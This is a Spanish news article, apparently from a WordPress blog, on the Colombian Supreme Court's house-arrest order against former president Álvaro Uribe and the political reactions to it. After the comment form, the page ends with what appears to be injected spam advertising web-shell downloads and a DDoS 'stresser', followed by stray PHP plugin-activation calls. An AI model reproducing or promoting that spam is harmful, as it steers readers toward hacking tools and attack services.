La detención del expresidente Uribe conmociona Colombia


Una decisión sin precedentes acaba de cambiar la historia de Colombia. Nunca antes un expresidente había sido detenido. Pero eso ha pasado con Álvaro Uribe Vélez, considerado como el hombre más poderoso del país y la figura que mantiene a la nación sudamericana en una absoluta polarización desde hace dos décadas.

La Corte Suprema de Justicia ordenó el martes su «detención preventiva» domiciliaria, mientras que se resuelve una investigación del exmandatario, que empezó en 2018, por manipulación de testigos, por lo que es acusado de soborno y fraude procesal.

Esa decisión ha causado una gran conmoción en el país, con manifestaciones a favor y en contra en las calles, y vislumbra desde ya un recrudecimiento de la batalla política entre uribistas y antiuribistas. El exmandatario es poderoso, entre otras razones, porque es el senador más votado de la historia y porque todavía tiene una gran influencia en buena parte del pueblo colombiano. Al punto de que gracias a su respaldo Iván Duque llegó a coronarse como el actual presidente de la república.

No en vano, este miércoles mismo, empleando un discurso firme y enfático, el presidente Duque salió en defensa del exmandatario y le ofreció su respaldo, a quien considera como un «patriota genuino». «Duele como colombiano que muchos de los que han lacerado al país con barbarie se defiendan en libertad o, inclusive, tengan garantizado jamás ir a prisión» mientras que a Uribe »no se le permita defenderse en libertad» habiendo gobernado Colombia en dos periodos de cuatro años, de 2002 a 2010, lamentó el presidente.

Ese discurso del mandatario enciende más un debate que parece interminable en Colombia: el Acuerdo de Paz con las Fuerzas Armadas Revolucionarias (FARC), que puso fin a una guerra de más de 50 años. Por un lado, los uribistas, consideran una calumnia la detención, mientras que altos mandos de las FARC han obtenido el perdón a raíz de la firma del acuerdo y cuentan con su propio partido político en el congreso. Y Uribe es un opositor acérrimo de la paz. Fue él la principal figura impulsora del voto por el ‘No’ a la firma del proceso en 2016.

Por otro lado, los antiuribistas consideran que este es un gran paso de la Justicia colombiana. Como el senador de izquierda Iván Cepeda quien demandó a Uribe por supuestos vínculos con el paramilitarismo en 2014 y ahí comenzó un largo proceso en el que uribe realizó una contra demanda de la que Cepeda quedó absuelto y se inició la investigación contra él por la supuesta manipulación de testigos. «No hay personas que estén por encima de la ley por muy poderosas en influyentes que sean», deslizó Cepeda.

Su influencia

La detención domiciliaria se explica porque la Corte considera que podría haber manipulaciones en el proceso. «La providencia fue adoptada con base en un riguroso estudio jurídico sobre la realidad procesal, que indica posibles riesgos de obstrucción de la justicia, respecto al futuro recaudo de pruebas de hechos presuntamente delictivos que involucran», señaló la Corte en un comunicado.

No es para menos. Porque Uribe es uno de los hombres más influyentes del país y, además, es el ‘padre’ y líder indiscutible del Centro Democrático, el partido gobernante.

Este hecho ha ocasionado un torbellino de opiniones a favor y en contra de numerosos líderes políticos. Y vaticina un tiempo convulso en la nación donde ya se presenta una situación dramática por el aumento de asesinatos de líderes sociales y de derechos humanos, un alto riesgo de ruptura del acuerdo de paz y por una con una polarización política más encendida que nunca. Todo eso, sumado a la pandemia del coronavirus.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );